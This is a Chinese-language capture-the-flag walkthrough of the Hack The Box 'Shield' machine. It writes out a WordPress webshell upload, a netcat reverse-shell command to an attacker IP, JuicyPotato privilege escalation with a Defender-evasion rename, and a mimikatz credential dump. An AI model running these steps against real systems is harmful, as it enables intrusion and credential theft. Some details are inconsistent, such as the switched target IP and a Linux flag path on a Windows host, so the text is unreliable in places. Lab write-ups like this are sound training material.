收集信息
首先用nmap对目标主机进行扫描。
nmap -sV -sS -F 10.10.10.29
-sV 代表扫描端口和开放的服务信息
-sS 代表用TCP半开式扫描
-F 快速扫描,扫描常用的端口
我们发现了这台主机开放了80端口和3306端口,并且这是一台windows系统的服务器。我们首先访问一下这个网站。在这网站什么也没有发现,按F12查看源代码也没有发现有利用价值的URL,点击图片后就跳转到了微软公司的官方网站。
我们尝试用目录扫描器扫描一下这个网站。打开dirbuster,在Target URL一栏中输入需要扫描的目标网址
http://10.10.10.29/然后再File with list of dirs/files一栏填入目录字典地址。在kali中自带了字典,位于 /usr/share/dirbuster/wordlists/目录中。然后点击 start按钮开始扫描。
从扫描到的目录来看,这是用WordPress搭建的一个网站,还发现了这个网站的后台登陆地址:/wordpress/wp-login.php。
登陆后台
按照以往的规律,该后台的账号和密码是在上一个靶机中获取到的。我们已经获取到账号和密码为:admin:P@s5w0rd!,经过测试可以成功登陆后台。
在后台中发现有一个修改主题的功能,在这个功能中可以修改php文件,我们尝试将一句话木马写入其中。
weevely generate a a.php
这里是用工具weevely生成一个名为a.php的一句话木马,连接密码为a。
选择Apperance(外观),然后现在Theme Editor(主题编辑器),然后选择single.php(只要是个php文件就行),然后把a.php里面的内容粘贴到该页面文本框里面,然后点击UPdate FIle(更新文件)即可完成修改。
建立shell
然后通过weevely连接服务器,建立shell。但是我们应该知道刚刚修改的页面在哪里,我们可以查看刚刚目录扫描出来的网站地图,也可以通过百度搜索WordPress的主题文件在哪里。
weevely http://10.10.10.28/wordpress/wp-content/themes/Highlight/singgle.php a
第一个参数为一句话木马地址
第二个参数为一句话木马密码
连接上一句话木马后会建立一个shell,我们执行命令 systeminfo来查看系统的版本以及补丁。我们发现这是一个windows server 2016的系统,通过分析得出该系统应该可以通过烂土豆提权还获取系统权限。
提升权限
首先下载烂土豆提权所需要的工具JuicyPotato.exe
下载该工具的地址为:https://github.com/ohpe/juicy-potato/releases/tag/v0.1
然后修改文件名。官方称改名可以避免Windows Defender查杀,但是在这个把靶机中不修改名字也能提权成功。
mv juicyPotato.exe js.exe
然后分别将js.exe和nc.exe上传到服务器,其中nc.exe用来反弹shell,js.exe用来提高系统权限。
:file_upload2web js.exe
:file_upload2web nc.exe
然后把建立反弹shell的命令写入一个bat文件。注意其中的文件路径,改成自己上传nc.exe所在 的文件路径。
echo START C:\inetpub\wwwroot\wordpress\wp-content\themes\Highlight\nc.exe -e powershell.exe 10.10.14.116 1111 > shell.bat
然后再本地监听一个端口1111,这个端口是刚才写入bat中的端口。
rlwrap nc -lvnp 1111
rlwrap 的作用是使shell更加好用,自己可以对比一下用于不用rlwrap的效果。
-l 代表监听模式
-v 代表输出详细报告
-n 代表不执行DNS查询,如果使用的是域名就不能加入该参数
-p 指定端口号
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\Highlight\shell.bat -l 1337
然后执行烂土豆提权程序。
查看当前用户权限,是否符合要求
whoami /priv。如果开启SeImpersonate权限,juicypotato的参数可以使用
-t t。如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用
-t u。如果两个权限都开启,可以选择
-t *。如果都没开启,那么无法提权。
查看RPC默认端口是否为135
如果被修改,juicypotato的参数可以使用
-n指定修改后端口 ,默认则不用指定。如果系统禁用了RPC,只要找到另一系统,能够以当前用户的权限进行远程RPC登录也可提权,只要指定juicypotato的参数-k `即可。
详细内容可以参考:
https://zhuanlan.zhihu.com/p/333928748
执行后发现报错了, COM -> recv failed with error: 10038,后来发现在webshell中执行烂土豆提权没有指定CLSID参数就会报错,可以用-c来指定CLSID。CLSID可以根据操作系统来选择,参考列表为:https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\Highlight\shell.bat -l 1337 -c {87BB326B-E4A0-4de1-94F0-B9F41D0C6059}
然后再监听窗口已经看到了目标机器反弹过来的shell,查看一下权限 whoami,发现已经有了系统权限。
然后就可以在 /root/root.txt中获取了flag了。
cat /root/root.txt
获取账号密码
最后需要获取账号和密码,上传mimikatz。mimikatz在kali中自带,位于 /usr/share/windows-resources/mimikatz/x64中。在weevely中上传该程序。
:file_upload2web /usr/share/windows-resources/mimikatz/x64/mimikztz.exe
然后在有系统权限的shell中执行下面命令获取账号和密码。
./mimikatz.exe
sekurlsa::logonpasswords
参考文献
[1] https://www.linkedin.com/pulse/hack-box-shield-nathan-barnes,Hack the Box: Shield
[2] https://zhuanlan.zhihu.com/p/333928748,Hackthebox靶场练习-Shield
[3] https://www.freesion.com/article/8779780166/,烂土豆JUICYPOTATO提权原理和利用
[4] https://blog.csdn.net/smli_ng/article/details/106071142,weevely详细使用教程